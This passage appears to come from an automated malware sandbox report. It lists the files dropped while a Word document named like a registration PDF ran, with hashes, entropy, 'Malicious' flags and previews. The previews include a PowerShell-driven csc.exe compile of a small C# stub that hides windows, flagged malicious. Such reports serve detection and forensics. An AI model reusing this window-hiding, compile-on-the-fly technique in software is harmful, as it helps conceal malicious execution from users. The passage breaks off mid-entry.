                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5mc5l0q.n0d.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0980022266232616
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7YnqqmPN5Dlq5J:+RI+ycuZhNeakSmPNnqX
                                                                                  MD5:603EA8FB2D1985655BC921C460F59162
                                                                                  SHA1:1FD3273DA3CBD2CB909022A1A58614E09AD75BE8
                                                                                  SHA-256:A626DE73ABAA5D2C32F8B8DBFB295C1D6B2142FDEF65FD790FB13274D5136375
                                                                                  SHA-512:DCD42A09BF6F23C8C56E6719F0ECE64885CD369390FFC3192826C795A696F2EC83EA76A00760C7FA0320715C228FEACD5E0C80ABBD0A7310C20267D72C0D3C6B
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.z.2.e.n.i.l.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.z.2.e.n.i.l.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):244
                                                                                  Entropy (8bit):4.952945910145069
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                  MD5:6E7BC02C23E28738F9898185137720DB
                                                                                  SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                  SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                  SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                  Malicious:false
                                                                                  Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }

                                                                                  C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):371
                                                                                  Entropy (8bit):5.276008342536411
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fnZ+zxs7+AEszICN23fnh:p37Lvkmb6KmcWZE75
                                                                                  MD5:2EE46E6156FA5AC26B639071DECAECC0
                                                                                  SHA1:CC516637D539509F03E24B09D1F3A4C1F3EF86E1
                                                                                  SHA-256:BD428B9D50A8F793F4681337EFC3DC5BDA5ADE917EA2E0F27382DB64D2BF963B
                                                                                  SHA-512:E546EC60470A6D7F89CC18000F0BB141146E8B9C5A76C45CD22F54E4CA054025D97EB13DDE94FA7AAE04050C92AFB0CA5994D85DA71CC30AF09674F02D5AD324
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.7959447433778104
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSHJ2JJi8R86QMBTQetkZfy1ZBDd3+WI+ycuZhNeakSmPNnqI:6wNR9ZQRJy1XJ3l1ulea3aqI
                                                                                  MD5:14D37A861BAF8CD5219BCA00EE65AC16
                                                                                  SHA1:3E7300EAF8E1416219D2677CEE8E7E96157EDC3C
                                                                                  SHA-256:731C6ED779BDBD425C9488BA7C373C7116575401DD2C80774808988F00E11334
                                                                                  SHA-512:A4BEE73F5A1B1A46AC5CCD0148786BA1CEDEE6EE1C48863D6D71CCD0C702193D56E1A993DA2909AC7812C50F6A0E8E0BB974417567F2112C3347A187164B207B
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module

                                                                                  C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.out

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):872
                                                                                  Entropy (8bit):5.330204535343037
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:KSId3ka6KmNE78Kax5DqBVKVrdFAMBJTH:dkka6PNE78K2DcVKdBJj
                                                                                  MD5:4F5E52AFFF8DAFC7A90791C6D0FEFD0C
                                                                                  SHA1:BE2315F5F82383C179256831490FA028A2B4A9A3
                                                                                  SHA-256:BF90BB2884657BE1ADD304FBCD772974B0860792703870F9CAA9A54CE2AF594B
                                                                                  SHA-512:D2327E113F947370519AC9EED17ED9F085241D453144DB6907879A37A5E2DB8BB61C372EFAC2E8F3C012AA1EB1A1F8275A47505FBEB8E8EA8AD2891AFC881173
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\~$eting-Registration.pdf.docx

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.744136704370612
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:6NmltlylDQNSLfVndnlgXllfl2tllRnCqLAnUblX0:mSmMGdeuXnnCqLCsX0
                                                                                  MD5:66A10BFF3269A86D8D47D3111A8FFF1C
                                                                                  SHA1:34131BCEA6B27423D7DAA68D37C27C90AF7A8749
                                                                                  SHA-256:3A2BCFB3B3D67BF764427CF4346C4B9A6983B072588B73EA5E25581BB054F338
                                                                                  SHA-512:A0ABDEAE0E9F9D37B483BB5A0B223164B7ED45F7F0D6FA04EB8F0FEED6C9E0B31915F2E7ADD35A29AC4C747CB3E1784176578B71E57CE335AEAFB76BE5EC2F2F
                                                                                  Malicious:false
                                                                                  Preview:.user.................................................A.r.t.h.u.r............o.....p.M.....5.......................5.........R.1..Ja..|......S.1...........G..

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.78583354080372
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:6NmltlylDQNT9tFFlnlNAH3lYqRUR0:mSmMb3LjI3lYLR0
                                                                                  MD5:D22AC74AE30F6228824F9B15C982B20E
                                                                                  SHA1:A7483F041254688E575BCF690FA79AF152C73AE0
                                                                                  SHA-256:08AE6807F13E9CAED0D9936CFCF06CE458941B93DDE2940CB13910FF060AC112
                                                                                  SHA-512:F785EF9D261D1EA42CA11AF41C170663890850CFCC447659DBC07CDC5A124757AA378EDF09A670756AC0B99259344F543919BCDFC84CADE097F14167E45240FE
                                                                                  Malicious:false
                                                                                  Preview:.user.................................................A.r.t.h.u.r.............o............GK......................GK..............J...|....O.S.1...........G..

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):18
                                                                                  Entropy (8bit):2.725480556997868
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Qkh1QNIl:Qk8W
                                                                                  MD5:D1F4EBCAA7623D3DBFBF051D65AB1130
                                                                                  SHA1:A51DDF1371C35784AA2AF44C5EE706285B378CF7
                                                                                  SHA-256:A838F07E91D01FCF6874D4F5495F69B9E6AB483D367E0E188A809700DC0D0AAE
                                                                                  SHA-512:EC32CB4736C75066947B9478B644F550D8B48510D98B4E2D065DFF2219F94D76E83AC886D9FEE795580C17C33388A8B7AA858F71754C97A34CAF976B21B17448
                                                                                  Malicious:false
                                                                                  Preview:..A.r.t.h.u.r.....

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):2
                                                                                  Entropy (8bit):1.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Qn:Qn
                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                  Malicious:false
                                                                                  Preview:..

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN3c09.lex

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):2
                                                                                  Entropy (8bit):1.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Qn:Qn
                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                  Malicious:false
                                                                                  Preview:..

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\496VU0XZ56U18OL9E2RK.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6222
                                                                                  Entropy (8bit):3.7388077438494287
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3sWMCQGKhkvhkvCCtqvDjt63HFvDjt63HO:3ssUqDj0tDj0+
                                                                                  MD5:8458C64E825CB6796230D3BC39484B3E
                                                                                  SHA1:73A281F5BD2821A99466C600CD3038F8BCB656E2
                                                                                  SHA-256:760DC1515D4E44BED3F52317D57EE0B88AF1A67A5027AEEB32F66F8771C2418B
                                                                                  SHA-512:D59F26C03571E62F4123E5339872E5050057289C125D1B9B3FBD787F43368C1C09C44FA97BC007EED70781735A90743DAE7F9819DE7370C777CABA986984E06B
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...;.}.S...H..J.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S....[D@.1.....J.1......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.hY.M....B......................A!.A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......"S.hY.M....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.hY.M....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......"S.hY......F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`hY......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`hY......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.hY......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.hY.M....i...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6222
                                                                                  Entropy (8bit):3.7388077438494287
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3sWMCQGKhkvhkvCCtqvDjt63HFvDjt63HO:3ssUqDj0tDj0+
                                                                                  MD5:8458C64E825CB6796230D3BC39484B3E
                                                                                  SHA1:73A281F5BD2821A99466C600CD3038F8BCB656E2
                                                                                  SHA-256:760DC1515D4E44BED3F52317D57EE0B88AF1A67A5027AEEB32F66F8771C2418B
                                                                                  SHA-512:D59F26C03571E62F4123E5339872E5050057289C125D1B9B3FBD787F43368C1C09C44FA97BC007EED70781735A90743DAE7F9819DE7370C777CABA986984E06B
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...;.}.S...H..J.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S....[D@.1.....J.1......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.hY.M....B......................A!.A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......"S.hY.M....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.hY.M....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......"S.hY......F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`hY......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`hY......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.hY......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.hY.M....i...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF555f87.TMP (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6222
                                                                                  Entropy (8bit):3.7388077438494287
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:3sWMCQGKhkvhkvCCtqvDjt63HFvDjt63HO:3ssUqDj0tDj0+
                                                                                  MD5:8458C64E825CB6796230D3BC39484B3E
                                                                                  SHA1:73A281F5BD2821A99466C600CD3038F8BCB656E2
                                                                                  SHA-256:760DC1515D4E44BED3F52317D57EE0B88AF1A67A5027AEEB32F66F8771C2418B
                                                                                  SHA-512:D59F26C03571E62F4123E5339872E5050057289C125D1B9B3FBD787F43368C1C09C44FA97BC007EED70781735A90743DAE7F9819DE7370C777CABA986984E06B
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...;.}.S...H..J.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S....[D@.1.....J.1......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.hY.M....B......................A!.A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......"S.hY.M....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.hY.M....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......"S.hY......F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`hY......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`hY......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.hY......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.hY.M....i...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BR2S52B1BXZTXDSDF1WW.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6222
                                                                                  Entropy (8bit):3.733172343782242
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:ok53C5GihkvhkvCCtqvDjt63HFvDjt63HO:ok58qDj0tDj0+
                                                                                  MD5:0636102FF182CC44C3A444576A1B08A4
                                                                                  SHA1:9C9EEBB1D0264C6922931EF5A2B47CEFBE8142BE
                                                                                  SHA-256:853363DD9236E7CF0786DD568451E730223678A46B4D3BAC424803560ABBC5D5
                                                                                  SHA-512:F21722B5B92BD1781FE482E1E3AFB55DAC98F26C3C9D7C0D57DE4B3D4D1FFE50652B3C1A8FB9C2BE2C44F3A3706958BC781809C5FB38A8DF6902198D0AB08CA4
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...;.}.S...l_mL.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S....[D@.1...<.R.1......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.hY.M....B......................A!.A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......"S.hY.M....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.hY.M....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......"S.hY.M....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`hY.M....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`hY.M....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.hY.M....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.hY.M....i...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WRW5128W53EDHX6CBM39.temp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):12
                                                                                  Entropy (8bit):0.41381685030363374
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:/l:
                                                                                  MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                  SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                  SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                  SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                  Malicious:false
                                                                                  Preview:............

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):12
                                                                                  Entropy (8bit):0.41381685030363374
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:/l:
                                                                                  MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                  SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                  SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                  SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                  Malicious:false
                                                                                  Preview:............

                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):0.34726597513537405
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlll:Nll
                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                  Malicious:false
                                                                                  Preview:@...e...........................................................

                                                                                  C:\Windows\System32\spp\store\2.0\cache\cache.dat

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\sppsvc.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):692744
                                                                                  Entropy (8bit):3.8802978146692517
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:DEwO2zhWrT8e+NIF7VObx6f7uBWdYr+5i6iXhMTUA28yIGpZw:DEwO2FWrT8/IF7VObx6f67I
                                                                                  MD5:4B22D3503AEE4CC3D66388D54B43ED2C
                                                                                  SHA1:AA10C189425045735A8DF416CD8EA92D9A83D98E
                                                                                  SHA-256:CFED9EF1741DB4FAD1228E960C69CAB47EBB06BAEC68AA00418F3D6FABB34372
                                                                                  SHA-512:667F3C112F57920A33DB4D5B1A83D416A32470174A9EBB2B51C74EF7B1B3B1725D2119B6100C4AFAC6E05B5E278F96151A0725913E66DBE6518F7AA54653BBDF
                                                                                  Malicious:false
                                                                                  Preview:..E(....................;._....................................$.$.G.l.o.b.a.l.$.$......GcP.....................\.....Z...0...+.0.J.f.p.q.U.8.x.J.e.Y.n.Z.J.W.G.k.L.b.7.o./.C.D.+.A.J.9.U.P.y.A.e.m.R.4.2.m.F.n.1.s.=...........E(......................j.............................Z.......+.2.e.7.W.B.7.f.+.F.7.k.k.4.M.y.C.N.s.p.j.x.r.8.T.7.W.H.q.u.k.M.w.4.H.5.C.o.m.q.c.L.Q.=..........R2H....................Uz(.....................(5X.........D...O.f.f.i.c.e. .1.9.,. .T.I.M.E.B.A.S.E.D._.E.V.A.L. .c.h.a.n.n.e.l...............Z...0...+.4.R.6.u.F.1.m.q./.B.3.W.x.J.e./.F.6.Z.l.g.e.6.z.r.T.5.4.N.8.w.2.l.8.S.Q.Q.3.y.p.L.Q.=...........E(......................j.....................8..=....Z.......+.5.9.4.3.l.j.l.G.R.C.2.b.R.G.h.s.Y.q.K.N.O.g.0.3.U.y.s.i.K.c.w.b.c.a.T.k.W.2.V.f.N.4.=..........R2H....................Uz(......................PPu............!.......J...J...e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.3.d.8.7.e.5.0.0.a.0.0.3.........e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_1oa3zfiw.341.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_1vhkqicy.v5b.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
